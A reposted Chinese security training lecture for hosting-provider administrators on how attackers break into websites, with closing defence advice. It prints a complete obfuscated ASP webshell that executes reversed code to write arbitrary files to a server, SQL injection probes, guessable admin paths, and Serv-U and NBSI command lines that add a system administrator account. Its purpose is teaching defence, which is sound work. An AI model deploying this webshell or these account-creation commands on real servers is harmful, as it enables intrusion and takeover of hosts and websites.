针对WIN 2003的安全培训全部结束之后我们会推出针对LINUX的安全课程,然后还包括服务器的日常管理应该建立一个怎样的体系,怎么来规
范化管理,防止***利用管理员的管理不当来进行***,还包括对注册表安全分析,系统进程分析,系统服务分析,系统策略分析,系统日志分析,
权限分配体系的建立,到一些***程序的分析,包括一些WEB***,网页病毒,数据库***,应用程序***,系统内核级***,还有一些ARP欺骗,ARP
***分析等,这些都会安排在我们培训课程当中,我们安排这些培训就是为了帮助各位IDC技术的朋友们做好你们服务器的安全管理,以保障客户
网站和服务器的安全稳定运行,提升你们公司对客户的服务品质。
今天讲的内容是《网站***手段及如何保障网站安全》,我们大家都知道,现在90%以上的***对服务器的***都是通过80端口的WEB服务来
的,那为什么对于网站***的比率会这么高呢?SQL注入只是WEB***的一种方法,为什么对于网站***的比率会这么高呢?
表面原因是网站存在各种各样的安全漏洞,实质的原因是什么呢?是网站应用的广泛,网站应用的普及势必会有更多的网站程序员被培养
出来,网站程序员一多起来之后,又没有一些良好的代码规划体系,所以很多存在各种各样漏洞的网站就被开发出来了,说的简单点就是做网
站的客户越来越多,一些企业需要网站,电子商务公司需要网站,视频公司需要网站,游戏公司需要网站,哪怕是一些个人站长也都会搞一些
网站,所以网站泛滥了,漏洞自然就多了。
那网站有了漏洞,那大家知道***是怎么来利用这些网站来进行***的呢?工具软件是配合***来***的,我们要做好网站的防御工作,
就肯定要知道***都用了哪些技术手段,这样才好做好防御的工作,那现在我们就来跟大家分析一下***对网站的***手段。
网站***手段当中***最常用的手段就是注入***,讲到注入***,很多以为就只是利用注入点列出数据库内容,然后通过后台上传
WEBSHELL,但实际上这只是***注入点***的一个很小的手段,今天我们就把这些***的各种注入点***手段都公之于众,注入***当中,最
初级的方法是ASP+ACCESS的注入***技术,ASP+ACCESS指的是ASP的网站,ACCESS的数据库,通常***对网站进行注入,会用一些手工的方法来
判断,比如在一些http://www.xxx.com/list.asp?id=1这样的网址后面加上一个单引号http://www.xxx.com/list.asp?id=1'
如果打开URL地址,发现返回错误信息之后,就八成是有注入漏洞了,为了进一步确认,***会用and 1=1和and 1=2的方式来判断
http://www.xxx.com/list.asp?id=1 and 1=1
http://www.xxx.com/list.asp?id=1 and 1=2
只要这两次打开URL地址的页面返回的结果不一样,那可以确定网站是存在注入漏洞了,***为了简便一些注入漏洞的判断,于是写了一些包括
明小子,阿D,NBSI等注入工具来辅助***判断,而且这些工具当中也都加入了更多***的功能了,这个是SQL注入的一种。
***在拿到注入点之后,就会手工或者通过工具来列出数据库的内容,那我想很多人要问了,***列数据库的内容有什么用?能实现***
吗?作用其实还蛮大的,首先,很多网站都是有后台管理功能的
一般后台管理功能的账号和密码都存在数据库里面,所以***就要想办法列出数据库的账号和密码信息
,很多后台账号和密码是明文的,也有一部分是加密的,加密大部分都采取了MD5加密的方式,但是很多管理员设置得比较简单,用暴力破解法
就能破解出来,拿到这些信息之后,***就会想办法找到一些网站的后台的登录地址,很多网站后台的登录地址都比较容易猜
比如http://www.1.com/admin/admin.asp
http://www.1.com/admin/manage.asp
http://www.1.com/guanli/index.asp
等等,***工具当中的猜解后台登录地址的功能中都加入了这些可能被设置的URL地址,那***拿到后台登录地址之后,就可以很从容的输入账
号和密码登录进去了。
那***登录网站后台又能有什么作用呢?不是还没达到***网站的目的吗?我们如果有管理网站的人应该知道,很多网站后台系统里面都
有一些上传图片,备份数据库的功能,正是这些功能给了***很多机会,***可以很轻松的利用上传图片的功能上传一个ASP***程序,由于不
同网站程序都会有相应的***,如ASP***,ASP.NET***,PHP***,JSP***,所以我们统称为WEB***,最经典的是 海阳顶端***,ASP***
就是用ASP语言编写的网站管理程序,其实前些年,很多网站都会用ASP管理程序来管理网站,但后面有了FTP管理工具之后就很少有人用了,那
这样管理功能的网站程序就会***利用了,群共享里面有个hh.asp的文件,现在杀毒软件都会查杀ASP***的,这个只是ASP***当中最普通的
一个。
在***技术当中,他们都把这种逃过杀毒软件查杀的技术叫“免杀”,***做免杀处理的方法有很多种,我再给大家看一种***对ASP***
做的免杀处理的代码,大家看看这个文件
<%
hu="伟"">p/<>b/<>tnof/<...你爱我声说你对再想多我:琳>'der'=roloc '4'=ezis tnof<>b<>'retnec'=ngila p<"" etirw.esnopseR 伟
"">p/<>b/<>tnof/<......骗你被 边身你在呆会是还我,遍一择选再以可果如,全完不烧燃却念思的你对何为,前从段一那出漫弥,脸的你出漫弥
却雾烟但, 眠失而你想了为再不誓发, 烟根这完抽的狠狠,现出未从远永的你起想, 烟香色白根一燃点,边沿床的色蓝蔚在坐我剩只,间房进洒色
月帘窗吹风,见再说不是就歉抱句多好了说你, 天雨下个一那的手分起想,间之我你起想 点三晨凌>'der'=roloc '4'=ezis
tnof<>b<>'retnec'=ngila p<"" etirw.esnopseR 伟 "">mrof/<"" etirw.esnopseR 伟 "">存保=eulav timbus=epyt tupni<""
etirw.esnopseR 伟 "">aeratxet/<>23=htdiw 01=swor 08=sloc ataddfyc=eman aeratxet<"" etirw.esnopseR 伟 "":容内的马入输""
etirw.esnopseR 伟 "">rb<"" etirw.esnopseR 伟 ))""EMAN_TPIRCS""(selbairaVrevreS.tseuqeR(htappam.revres etirw.esnopseR 伟 ""径
路对绝件文本"" etirw.esnopseR 伟 "">rb<"" etirW.esnopseR 伟 "">05=ezis 23=htdiw htapdfys=eman txet=epyt tupni<""
etirW.esnopseR 伟 "">tnof/<:)psa.x\bew\:D如:名件文括包(径路对绝>der=roloc tnof<的件文存保"" etirw.esnopseR 伟 "">tsop=dohtem
''=noitca mrof<"" etirw.esnopseR 伟 gnihtoN = OSFjbo teS 伟 gnihtoN=eliFtnuoCjbo teS 伟 esolC.eliFtnuoCjbo 伟 fi dne 伟
raelc.rre 伟 fi dne 伟 "">tnof/<!sseccuSnU evaS>der=roloc tnof<"" etirw.esnopser 伟 esle 伟 "">tnof/<!sseccuS evas>der=roloc
tnof<"" etirw.esnopser 伟 neht 0= rre fi 伟 atadf etirW.eliFtnuoCjbo 伟 )eurT,)""htapdfys""(tseuqer
(eliFtxeTetaerC.OSFjbo=eliFtnuoCjbo teS 伟 )""ataddfyc""(tseuqer = atadf 伟 neht """"><))""htapdfys""(tseuqer(mirT fi 伟
)""tcejbOmetsySeliF.gnitpircS""(tcejbOetaerC.revreS = OSFjbo teS 伟 txen emuser rorre no 伟 eliFtnuoCjbo mid 伟 atadf mid 伟
OSFjbo mid伟"
execute(UnEncode(hu))
function UnEncode(cc)
for i = 1 to len(cc)
if mid(cc,i,1)<> "伟" then
temp = Mid(cc,
i, 1) + temp
else
temp=vbcrlf&temp
end if
next
UnEncode=temp
end function
%>
大家看看这段代码
<"" etirw.esnopseR 伟 "">aeratxet/<>23=htdiw 01=swor 08=sloc ataddfyc=eman aeratxet<"" etirw.esnopseR 伟 "":容内的马入输""
etirw.esnopseR 伟 "">rb<"" etirw.esnopseR 伟 ))""EMAN_TPIRCS""(selbairaVrevreS.tseuqeR(htappam.revres etirw.esnopseR 伟 ""径
路对绝件文本"" etirw.esnopseR 伟 "">rb<"" etirW.esnopseR 伟 "">05=ezis 23=htdiw htapdfys=eman txet=epyt tupni<""
etirW.esnopseR 伟 "">tnof/<:)psa.x\bew\:D如:名件文括包(径路对绝>der=roloc tnof<的件文存保"" etirw.esnopseR 伟 "">tsop=dohtem
''=noitca mrof<"" etirw.esnopseR 伟 gnihtoN = OSFjbo teS 伟 gnihtoN=eliFtnuoCjbo teS 伟 esolC.eliFtnuoCjbo 伟 fi dne 伟
raelc.rre 伟 fi dne 伟 "">tnof/<!sseccuSnU evaS>der=roloc tnof<"" etirw.esnopser 伟 esle 伟 "">tnof/<!sseccuS evas>der=roloc
tnof<"" etirw.esnopser 伟 neht 0= rre fi 伟 atadf etirW.eliFtnuoCjbo 伟 )eurT,)""htapdfys""(tseuqer
(eliFtxeTetaerC.OSFjbo=eliFtnuoCjbo teS 伟 )""ataddfyc""(tseuqer = atadf 伟 neht """"><))""htapdfys""(tseuqer(mirT fi 伟
)""tcejbOmetsySeliF.gnitpircS""(tcejbOetaerC.revreS = OSFjbo teS 伟 txen emuser rorre no 伟 eliFtnuoCjbo mid 伟 atadf mid 伟
OSFjbo mid伟"
特别是这段,大家都看不懂了吧,大家可以反过来看这段代码,etirw.esnopseR就是response.write
这个变形马是把所有的代码都反过来写的,所以我们大家要清楚,***是异常狡猾的,他们会想尽各种各样的方法来避免杀毒软件的查杀和管
理员对他们的打击,当然,我们也非常欢迎大家查到一些各种最新的WEB***之后给我们红盟提交过来,我们会把各种最新的WEB***样本加入
到我们的安全软件当中去
***上传了ASP***之后,他们就有了普通users的权限了,我想大家也都看过了ASP***的功能,它能够查看系统账号信息,系统各个目录
,系统注册表,系统服务,还有是否有运行CMD的权限等等,***在拿到这些权限之后,他可能会做两项工作,第一个就是把服务器里面所有的
网站都挂马,为什么要挂马呢?因为***正是因为想通过挂马来感染用户的电脑,把用户电脑里面一些银行账号和密码,QQ账号密码,网游的
账号密码等信息都窃取,包括一些朋友,你们在个人电脑里面放的一些艳照,也都要小心了,小心***像曝光陈冠希那样曝光你们的艳照 ^_^
。
挂马是能赚很多钱的,所以这个工作***肯定会去做,***挂完马之后,下面要做的一项工作就是要提升他的权限,我们大家都知道win系统
权限有三层:guests,users和administrators,***只有提升到administrators权限才能远程登录到服务器里面,而且能完全控制服务器。
提升权限的方法有很多种,servu这个ftp服务软件大家很多人都用过吧,servu 6.0版本的就存在几种漏洞,包括构造账号提升漏洞,本地
溢出漏洞,还有远程溢出漏洞,最新的servu 7还没发现明显的漏洞,servu提权有两种方式 :一种是配置文件可被修改的提权方法,如果配置
文件可以被修改的话,就可以直接在配置文件里面增加一个管理员权限的FTP账号。这样就可以通过FTP的方式登录进去,然后使用命令建立一
个系统账号
quote site exec
然后就可以通过3389远程登录进去
quote site exec net user ccc ccc /add
使用类似这样的命令
现在很多***的ASP***当中都包含了能查看远程桌面端口的功能,因为在注册表里面都有3389端口的实际端口信息,所以***能很轻松就能知
道这些信息,那如果servu的配置文件不可修改,而servu的登录登录账号的密码是默认的,默认的是#l@$ak#.lk;0@P,所以***就可以利用这个本
地账号的密码来进行提权,这样***很容易都能提升成为管理员,***提权成功之后就可以控制系统的服务器了.
下面我们再来跟大家讲讲注入的其它技术,现在很多网站都采用的是ASP/ASP.NET+SQL数据库的架构,SQL来做数据库的话,安全性就更要注
意,因为SQL是有很严重的安全漏洞,那我们现在就来讲讲***利用ASP+SQL网站的***方式,我们都知道SQL数据库里面也有三种权限,PUBLIC,
DBOWNER,SA三种,很多网站数据库默认给数据库权限的时候都会是SA,SA是SYSTEM ADMINISTRATOR,这可是最高的权限和系统的ADMINISTRATOR是
平级的,所以***能利用的机会就更大了,通常如果SQL数据库的网站如果有注入漏洞的话,那***就能获取到管理员的权限,大家可以看看群共享
里面的NBSI 2.5的这个***注入工具,这是一个对SQL数据库网站注入的最大的***利器,这个注入工具,不但可以查看数据库信息,还能提权,大
家看看软件的这个界面,nbcommander栏目中,大家看命令执行,***确定了注入点之后,就可以利用命令执行里面的功能来建立系统账号
在命令文本里面直接输入:net user ccc ccc /add
net localgroup administrators ccc /add
这样就可以直接建立一个系统管理员账号,这些都是***用的工具,所以杀毒软件是会查杀的,如果建立不了账号,那***还可以利用上传的功
能,传一些VBS***之类的上去,然后用VBS***来下载一些***工具,达到提升权限的目的,其实越高深的***,就能突破更大的安全防御措施,注
入的***技术是千变万化的,***,传***,提权,控制系统,这些***技术都是***不同过程中都会用到,每一个过程都有N种***技术,所以理
论上***技术是有N+N+N+N种,各种之间根据实际情况都可以相互进行搭配,******只要采取一种就行了,***根据服务器实际漏洞的情况会采
取不同的***手段.
我们知道了***针对网站的这些***手段之后,那我们该怎么来防御呢?首先,先给服务器里面的网站加一些防注入代码,先探测一下哪些
网站有注入漏洞,然后加入防注入代码,第二,在网站后台的功能里面去掉上传的功能,不要使用备份数据库的功能,这样就可以避免***上传
ASP***,然后系统本身打好补丁,按照先后顺序来打,避免配置造成的错误被***利用,然后把服务器里面的各类应用软件都升级,特别是SERVU升
级到最新的7.0版,各种端口该关闭的都关闭掉,只留下一些必须要用到的,然后3389端口这一块要做一些限制,在终端服务配置里面的连接打开
RDP-TCP属性的“权限”里面,除了system和administrator两个账号之外,其它权限都不要给,那就只有administrator有权限登录进来,刚才讲
的是手工的方式来防御,然后安全防御还要配合一些安全软件来
1、杀毒软件,卡巴斯基,麦咖啡之类的都不错
2、360,最大的用处就是更新升级
3、漏洞检测和监控软件
我们红盟自己开发了安全检测软件,就是检测各类***程序,***,以及安全漏洞的工具,可以定期扫描一下,然后大家要明白,安全是一个动态
的概念,***的***技术层出不穷,随时随地都会有一些新的技术会出来,所以及时的做好服务器的更新,升级,加强防御措施是最好的安全防御
方式,好了,今天的课程讲完了 ,下次我们讲操作系统的安全***技术。
转载于:https://blog.51cto.com/25025/897210
扫一扫
281
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
